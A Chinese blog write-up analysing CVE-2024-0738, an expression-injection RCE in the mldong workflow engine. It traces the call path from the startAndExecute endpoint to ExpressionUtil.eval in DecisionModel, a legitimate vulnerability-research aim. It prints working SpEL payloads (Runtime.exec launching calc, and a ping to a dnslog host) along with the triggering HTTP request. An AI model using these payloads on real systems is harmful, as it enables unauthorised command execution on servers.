CVE-2024-0738 Mldong ExpressionEngine RCE漏洞分析

已于 2024-01-23 18:39:36 修改
阅读量990 收藏 22
点赞数 21
分类专栏: java代码审计 文章标签: java web安全 安全 开发语言 spring boot
于 2024-01-23 18:35:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shelter1234567/article/details/135778035
版权
漏洞描述

A vulnerability, which was classified as critical, has been found in ???? mldong 1.0. This issue affects the function ExpressionEngine of the file com/mldong/modules/wf/engine/model/DecisionModel.java. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251561 was assigned to this vulnerability.

个人开源mldong 1.0中发现一个严重漏洞。此问题影响文件 com/mldong/modules/wf/engine/model/DecisionModel.java 的 ExpressionEngine 函数。这种操纵会导致代码注入。攻击可能是远程发起的。该漏洞已向公众披露并可能被使用。

相关参考

NVD - CVE-2024-0738icon-default.png?t=N7T8https://nvd.nist.gov/vuln/detail/CVE-2024-0738

https://github.com/biantaibao/mldong_RCE/blob/main/RCE.mdicon-default.png?t=N7T8https://github.com/biantaibao/mldong_RCE/blob/main/RCE.md

mldong开源项目地址

mldong: SpringBoot+Vue3快速开发平台、自研工作流引擎icon-default.png?t=N7T8https://gitee.com/mldong/mldong

漏洞发现点

在mldong项目中DecisionModel类里有一个exec方法,它似乎可以执行表达式

 这个ExpressionUtil.eval引起了我们的兴趣。

本地建立文件,测试这行代码是否存在表达式注入。

 (测试环境最好在本项目中,保持环境包的一致性)


import cn.hutool.extra.expression.ExpressionUtil;

import java.util.HashMap;
import java.util.Map;

public class Test {
    public static void main(String[] args) {
        String expression = "T(java.lang.Runtime).getRuntime().exec('calc')";

        Map<String, Object> context = new HashMap<>();
        context.put("a", 1);
        context.put("b", 2);
        context.put("c", 3);

        Object result = ExpressionUtil.eval(expression, context);
        System.out.println(result);
    }
}

技巧:
        1.通过这个包ExpressionUtil在网上找寻使用示例代码或使用手册,再凭经验修改相关参数为表达式payload以造成命令执行。
        2.表达式的payload可以网上输入关键字收集,比如搜索cn.hutool.extra.expression.ExpressionUtil 表达式注入 历史漏洞什么。
        3.有了足够多的payload就可以做模糊测试了

本机计算机弹出,项目的确存在RCE漏洞

找寻调用接口

发现了漏洞点,如何寻找调用的接口,这里提供了几个技巧(还有什么技巧,请大佬补充)
1,右键找相关函数的usages,逐个分析
2,打上断点,前端点击功能看看那个接口会卡住

我这里右键找exec的usages

public abstract class NodeModel extends BaseModel implements Action {
    private String layout;// 布局属性(x,y,w,h)
    // 输入边集合
    private List<TransitionModel> inputs = new ArrayList<TransitionModel>();
    // 输出边集合
    private List<TransitionModel> outputs = new ArrayList<TransitionModel>();
    private String preInterceptors; // 节点前置拦截器
    private String postInterceptors; // 节点后置拦截器

    /**
     * 由子类自定义执行方法
     * @param execution
     */
    abstract void exec(Execution execution);
    @Override
    public void execute(Execution execution) {
        // 0.设置当前节点模型
        execution.setNodeModel(this);
        // 1. 调用前置拦截器
        execPreInterceptors(execution);
        // 2. 调用子类的exec方法
        exec(execution);
        // 3. 调用后置拦截器
        execPostInterceptors(execution);
    }

再次右键找execute的usages...

后面我就遇到了很多困难,因为java的继承类 接口实现类需要挨个分析 也不排除重名现象。如果想分析到接口层,可得下一番功夫。

这里我们先跳过这一步,来到前端的功能页面寻找相关的线索。....

待漏洞复现完毕后 我们再分析接口的调用!

.....

漏洞复现

进入后台管理在流程设计页面中新增流程设计

右键 设置流程属性  

添加这样的流程

点击条件判断的框

准备payload 打dns

T(java.lang.Runtime).getRuntime().exec('ping xxxx.dnslog.cn')  

保存 部署 准备执行  

 来到流程定义开始执行

 顺便添几个 点击确定

查看dnslog结果

ok rce成功复现

接口调用分析

看看它调用了什么接口

 post数据参考

POST /api/wf/processDefine/startAndExecute HTTP/1.1
Host: 
Connection: close

{"processDefineId":"1749714638596308993","f_startTime":["2024-01-23 ",null],"f_endTime":["2024-01-25 ",null],"f_reasonType":2,"f_day":2.5,"f_title":"test"}

来到后端

@PostMapping("/wf/processDefine/startAndExecute")
@ApiOperation(value = "启动流程实例")
@SaCheckPermission(value = {"wf:processDefine:startAndExecute","wf:processDesign:listByType"}, mode = SaMode.OR)
public CommonResult<?> startAndExecute(@RequestBody Dict args) {
    Long processDefineId = args.getLong(FlowConst.PROCESS_DEFINE_ID_KEY);
    args.remove(FlowConst.PROCESS_DEFINE_ID_KEY);
    processInstanceService.startAndExecute(processDefineId,args);
    return CommonResult.ok();
}

 跟进startAndExecute

public class ProcessInstanceServiceImpl extends ServiceImpl<ProcessInstanceMapper, ProcessInstance> implements ProcessInstanceService {
...
    private final ProcessTaskMapper processTaskMapper;
    private final ProcessCcInstanceMapper processCcInstanceMapper;
    @Override
    @Transactional(rollbackFor = Exception.class)
    public void startAndExecute(Long processDefineId, Dict args) {
        String operator = LoginUserHolder.getUserId().toString();
        FlowEngine flowEngine = SpringUtil.getBean(FlowEngine.class);
        ProcessInstance processInstance = flowEngine.startProcessInstanceById(processDefineId,operator,args);
        List<ProcessTask> processTaskList = flowEngine.processTaskService().getDoingTaskList(processInstance.getId(),new String[]{});
        // 取任务自动执行
        processTaskList.forEach(processTask -> {
            args.put(FlowConst.SUBMIT_TYPE, ProcessSubmitTypeEnum.APPLY.getCode());
            flowEngine.executeProcessTask(processTask.getId(),FlowConst.AUTO_ID,args);
        });
    }
...
}

在方法中,首先获取当前登录用户的操作员 ID:

javaCopy CodeString operator = LoginUserHolder.getUserId().toString();

然后,获取 FlowEngine 实例:

javaCopy CodeFlowEngine flowEngine = SpringUtil.getBean(FlowEngine.class);

接下来,使用 flowEngine 实例的 startProcessInstanceById 方法启动一个流程实例,并传入 processDefineIdoperatorargs 参数:

javaCopy CodeProcessInstance processInstance = flowEngine.startProcessInstanceById(processDefineId, operator, args);

然后,使用 flowEngine 实例的 processTaskService() 方法获取正在进行中的任务列表:

javaCopy CodeList<ProcessTask> processTaskList = flowEngine.processTaskService().getDoingTaskList(processInstance.getId(), new String[]{});

接下来,对任务列表进行遍历,并自动执行每个任务:

javaCopy CodeprocessTaskList.forEach(processTask -> {
    args.put(FlowConst.SUBMIT_TYPE, ProcessSubmitTypeEnum.APPLY.getCode());
    flowEngine.executeProcessTask(processTask.getId(), FlowConst.AUTO_ID, args);
});

跟进 flowEngine.executeProcessTask(processTask.getId(),FlowConst.AUTO_ID,args);

public class FlowEngineImpl implements FlowEngine {
    protected Configuration configuration;
    private ProcessDefineService processDefineService;
    private ProcessInstanceService processInstanceService;
    private ProcessTaskService processTaskService;
...
    @Override
    @Transactional(rollbackFor = Exception.class)
    public List<ProcessTask> executeProcessTask(Long processTaskId, String operator, Dict args) {
        Execution execution = execute(processTaskId,operator,args);
        if(execution == null) return Collections.emptyList();
        ProcessModel processModel = execution.getProcessModel();
        // 7. 根据流程任务名称获取对应的任务节点模型
        NodeModel nodeModel = processModel.getNode(execution.getProcessTask().getTaskName());
        // 8. 调用节点模型执行方法
        nodeModel.execute(execution);
        return execution.getProcessTaskList();
    }
...
}

这段代码首先调用 execute 方法来执行指定的流程任务,并将执行结果保存在一个 Execution 对象中。如果 execute 方法返回的 Execution 对象为 null,则直接返回一个空列表。

接着,代码从 Execution 对象中获取了当前任务所属的流程模型(ProcessModel 对象),并根据当前任务名称获取了对应的节点模型(NodeModel 对象)。最后,代码调用了该节点模型的 execute 方法来完成任务的执行。

需要注意的是,该方法使用了 @Transactional 注解来添加事务支持,保证代码在执行过程中出现异常时可以进行回滚。同时,该方法还使用了 Dict 类型的参数来传递一些额外的参数信息,以便在执行过程中进行相关操作。

 跟进Execution execution = execute(processTaskId,operator,args); 看看对参数的处理

public class FlowEngineImpl implements FlowEngine {
    protected Configuration configuration;
    private ProcessDefineService processDefineService;
    private ProcessInstanceService processInstanceService;
    private ProcessTaskService processTaskService;
...
	/**
     * 生成执行对象
     * @param processTaskId
     * @param operator
     * @param args
     * @return
     */
    private Execution execute(Long processTaskId, String operator, Dict args) {
        // 1.1 根据id查询正在进行中的流程任务
        ProcessTask processTask = processTaskService.getById(processTaskId);
        if(processTask == null || !ProcessTaskStateEnum.DOING.getCode().equals(processTask.getTaskState())) {
            throw new JFlowException(WfErrEnum.NOT_FOUND_DOING_PROCESS_TASK);
        }
        // 1.2 判断是否可以执行任务
        if(!processTaskService.isAllowed(processTask,operator)) {
            // 当前参与者不能执行该流程任务
            throw new JFlowException(WfErrEnum.NOT_ALLOWED_EXECUTE);
        }
        // 2. 根据流程任务查询流程实例
        ProcessInstance processInstance = processInstanceService.getById(processTask.getProcessInstanceId());
        // 3. 根据流程实例查询流程定义
        ProcessDefine processDefine = processDefineService.getById(processInstance.getProcessDefineId());
        // 4. 将流程定义文件转成流程模型
        ProcessModel processModel = ModelParser.parse(processDefine.getContent());
        // 5. 将流程任务状态修改为已完成
        processTaskService.finishProcessTask(processTaskId,operator,args);
        processTask.setTaskState(ProcessTaskStateEnum.FINISHED.getCode());
        // 6. 根据流程定义、实例、任务构建执行参数对象
        Execution execution = new Execution();
        execution.setProcessModel(processModel);
        execution.setProcessInstance(processInstance);
        execution.setProcessInstanceId(processInstance.getId());
        execution.setProcessTask(processTask);
        execution.setProcessTaskId(processTaskId);
        execution.setOperator(operator);
        execution.setEngine(this);
        Dict processInstanceVariable = JSONUtil.toBean(processInstance.getVariable(),Dict.class);
        Dict newArgs = Dict.create();
        newArgs.putAll(processInstanceVariable);
        newArgs.putAll(args);
        execution.setArgs(newArgs);
        // 如果提交参数中存在f_前辍参数,则更新到流程实例变量中
        Dict addArgs = Dict.create();
        args.forEach((key,value)->{
            if(key.startsWith(FlowConst.FORM_DATA_PREFIX)) {
                addArgs.put(key,value);
            }
        });
        if(ObjectUtil.isNotEmpty(addArgs)) {
            processInstanceService.addVariable(processInstance.getId(), addArgs);
        }
        return execution;
    }
...
}

 得到execution对象,返回进入nodeModel.execute(execution);

public abstract class NodeModel extends BaseModel implements Action {
    private String layout;// 布局属性(x,y,w,h)
    // 输入边集合
    private List<TransitionModel> inputs = new ArrayList<TransitionModel>();
    // 输出边集合
    private List<TransitionModel> outputs = new ArrayList<TransitionModel>();
    private String preInterceptors; // 节点前置拦截器
    private String postInterceptors; // 节点后置拦截器
/**
 * 由子类自定义执行方法
 * @param execution
 */
abstract void exec(Execution execution);
@Override
public void execute(Execution execution) {
    // 0.设置当前节点模型
    execution.setNodeModel(this);
    // 1. 调用前置拦截器
    execPreInterceptors(execution);
    // 2. 调用子类的exec方法
    exec(execution);
    // 3. 调用后置拦截器
    execPostInterceptors(execution);
}

进入exec方法,这就来到了触发漏洞点的地方

public class DecisionModel extends NodeModel {
    private String expr; // 决策表达式
    private String handleClass; // 决策处理类
    @Override
    public void exec(Execution execution) {
        // 执行决策节点自定义执行逻辑
        boolean isFound = false;
        String nextNodeName = null;
        if(StrUtil.isNotEmpty(expr)) {
            Object obj = ExpressionUtil.eval(expr, execution.getArgs());//漏洞触发点
            nextNodeName = Convert.toStr(obj,"");
        } else if(StrUtil.isNotEmpty(handleClass)) {
            DecisionHandler decisionHandler = ReflectUtil.newInstance(handleClass);
            nextNodeName = decisionHandler.decide(execution);
        }
        for(TransitionModel transitionModel: getOutputs()){
            if (StrUtil.isNotEmpty(transitionModel.getExpr()) && Convert.toBool(ExpressionUtil.eval(transitionModel.getExpr(), execution.getArgs()), false)) {
                // 决策节点输出边存在表达式,则使用输出边的表达式,true则执行
                isFound = true;
                transitionModel.setEnabled(true);
                transitionModel.execute(execution);
            } else if(transitionModel.getTo().equalsIgnoreCase(nextNodeName)) {
                // 找到对应的下一个节点
                isFound = true;
                transitionModel.setEnabled(true);
                transitionModel.execute(execution);
            }
        }
        if(!isFound) {
            // 找不到下一个可执行路线
            throw new JFlowException(WfErrEnum.NOT_FOUND_NEXT_NODE);
        }
    }
}
总结

本次我们分析了CVE-2024-0738漏洞,运用模糊测试的思想挖掘了ExpressionUtil.eval的表达式注入漏洞,之后找到相关调用接口,构造恶意的参数。从而造成表达式的执行。

本次漏洞研究发的包有点复杂,就不附赠poc。有想法的小伙伴可以尝试一下

至于ExpressionUtil.eval底层调用的机制,等下次分章再分析吧...

欢迎大佬评论区留言,

昵称还在想呢
关注
  • 21
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 336
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
jboss中间件漏洞总结
看不尽的尘埃——博客
02-09 6187
目录     前言   获取服务器所采用的中间件信息   JBOSS默认配置后台漏洞   弱口令/未授权访问   Jboss蠕虫   JMX控制台安全验证绕过漏洞CVE-2010-0738)   反序列化漏洞   命令执行   拒绝服务   其他漏洞   总结   前言 昨天搞了Vulhub靶场里的jboss三个反序列化漏洞,今天总结一下jbo...
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞 0x10靶场环境 0x20目录结构 CVE-2021-22192 ├── README.md ............... [此 README 说明] ├── imgs .................... [辅助 README 说明的图片] ├── gitlab .................. [Gitlab 容器的挂载目录] │ ├── Dockerfile .......... [Gitlab 的 Docker 构建文件] │ ├── config .............. [Gitlab 配置挂载目录] │ ├── data ................ [Gitlab 数据挂载目录] │ ├── logs ................ [Gitlab 日
SpringBoot+Vue3快速开发平台mldong
01-15
SpringBoot+Vue3快速开发平台、自研工作流引擎
SRC漏洞挖掘经验+技巧篇
wangluoanquan111的博客
09-07 755
我们经常听到漏洞这个概念,可什么是安全漏洞?想给它一个清晰完整的定义其实是非常困难的。如果你去搜索一下对于漏洞的定义,基本上会发现高大上的学术界和讲求实用的工业界各有各的说法,漏洞相关的各种角色,比如研究者、厂商、用户,对漏洞的认识也是非常不一致的。从业多年,我至今都找不到一个满意的定义,于是我自己定义一个:安全漏洞是信息系统在生命周期的各个阶段(设计、实现、
流行的表达式引擎简单分析对比
zwrlj527的专栏
10-29 6126
序        最近来了个能耗监测的需求,也就是对设备上报数据做一些业务的计算后阈值预警风控类的。对需求进行抽丝剥茧的拆解后,发现除去业务,最难的点也就是阈值比较了,到此有经验的码农很容易就想到了表达式计算吧。基本的规则增删改查、逻辑运算表达式生成做完后,就要着手啃最难的骨头了。考虑到设备上报数据的量,肯定要考虑性能,所以先做表达式的选型。 一、依赖引入       &nbsp
工作流引擎设计与实现·解析流程定义文件
mldong的博客
05-24 216
在上一篇我们手动构建了一个流程对象并简单打印执行,其构建流程对象的方式并不是很友好。为了更方便的构建流程对象,我们采用全新的方式,即解析基础篇提到的流程定义文件,并将其转成流程模型。
【Java工具类】HutoolUtil
daohangtaiqian的博客
05-11 1585
一个 Java 基础工具类,对文件、流、加密解密、转码、正则、线程、XML 等 JDK 方法进行封装,组成各种 Util 工具类。hutool-all官网hutool-aop JDK动态代理封装,提供非IOC下的切面支持hutool-bloomFilter 布隆过滤,提供一些Hash算法的布隆过滤hutool-cache 简单缓存实现hutool-core 核心,包括Bean操作、日期、各种Util等hutool-cron 定时任务模块,提供类Crontab表达式的定时任务。
Hutool工具类使用详解
03-08 1万+
Hutool是一个Java工具类库,由国内的程序员loolly开发,目的是提供一些方便、快捷、实用的工具类和工具方法,使Java开发者能够更加轻松地处理各种任务。Hutool的特点是简单易用、功能全面、代码清晰、文档完备,支持JDK 1.8及以上版本。目前,Hutool已经被广泛使用,并且已经发布了3.x版本。Hutool 3.x版本的特点是升级了依赖库、增加了一些新的功能和优化了性能。
工具类库 Hutool介绍与使用(请记得收藏)
houxian1103的博客
01-17 1万+
Hutool是一个小而全的Java工具类库,通过静态方法封装,降低相关API的学习成本,提高工作效率,使Java拥有函数式语言般的优雅,让Java语言也可以“甜甜的”。Hutool中的工具方法来自于每个用户的精雕细琢,它涵盖了Java开发底层代码中的方方面面,它既是大型项目开发中解决小问题的利器,也是小型项目中的效率担当;Hutool是项目中“util”包友好的替代,它节省了开发人员对项目中公用类和公用工具方法的封装时间,使开发专注于业务,同时可以最大限度的避免封装不完善带来的bug。
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
tomcat 升级到8.5.99后,系统启动不起来问题(修复 CVE-2024-24549 拒绝访问漏洞
最新发布
04-16
在8.5.98基础上,增加了修复 CVE-2024-24549 漏洞代码
CVE-2020-8813 Cacti v1.2.8 RCE.MD
04-13
CVE-2020-8813 Cacti v1.2.8 RCE
应用安全-应用服务器/中间件漏洞整理
weixin_30507269的博客
06-17 597
IIS 支持协议 HTTP HTTP/2 HTTPS FTP FTPS SMTP NNTP等 支持操作系统 NT/2000/XP Professional/Server 2003及后续版本(XP Home中没有) 版本(默认) ...
安全漏洞概念及分类
热门推荐
maoji的专栏
10-12 3万+
本文是一个安全漏洞相关的科普,介绍安全漏洞的概念认识,漏洞在几个维度上的分类及实例展示。 安全漏洞及相关的概念 本节介绍什么是安全漏洞及相关的概况。 安全漏洞的定义 我们经常听到漏洞这个概念,可什么是安全漏洞?想给它一个清晰完整的定义其实是非常困难的。如果你去搜索一下对于漏洞的定义,基本上会发现高大上的学术界和讲求实用的工业界各有各的说法,漏洞相关的各种角色,比如研究者、厂商、
Hutool,轻松玩转字符串操作, 都是案例,值得收藏!
数字世界探险者
06-22 4892
今天给大家带来一个Java工具类库 – Hutool,它封装了很多常用的功能,包括字符串、日期、加密、IO、网络等方面的操作,使用简单,代码量少,功能强大。以上是Hutool常用的一些用法案例及案例效果,Hutool提供的功能非常丰富,可以帮助Java开发者快速开发高质量的应用程序。无论是判断字符串是否为空、转换为数字、去除空格,还是进行拼接、替换或截取操作,这些常见的字符串处理需求经常让人感到烦恼。无论是日常开发还是处理复杂的字符串操作,Hutool的StrUtil工具类都是你的得力助手。
推荐一款超厉害的国产Java工具类Hutool
初念初恋的博客
11-16 5393
Hutool是一个小而全的Java工具类库,通过静态方法封装,降低相关API的学习成本,提高工作效率,使Java拥有函数式语言般的优雅,让Java语言也可以“甜甜的”;
cve-2024-0195
01-19
cve-2024-0195是一个已被公开的漏洞编号,通常用于标识特定的计算机安全漏洞。这个漏洞编号通常由安全研究人员或组织在发现并报告一个新漏洞时,给漏洞分配一个唯一的标识符。 在这种情况下,cve-2024-0195表示在2024年发现的第195个已知漏洞漏洞编号的目的是帮助用户和组织识别并补救安全漏洞,以保护其系统和数据免受潜在的攻击和损害。 对于普通用户来说,了解漏洞编号有助于他们更好地了解他们的系统或软件是否受到当前已知的漏洞威胁。对于技术人员和安全专家来说,漏洞编号可以帮助他们更有效地管理和防范潜在的安全风险。 总之,cve-2024-0195代表着一个已知的计算机安全漏洞,可能需要通过软件更新、修复补丁或其他安全措施来加以解决。因此,对于系统管理员和用户来说,了解并及时处理漏洞编号所代表的漏洞是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

昵称还在想呢

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值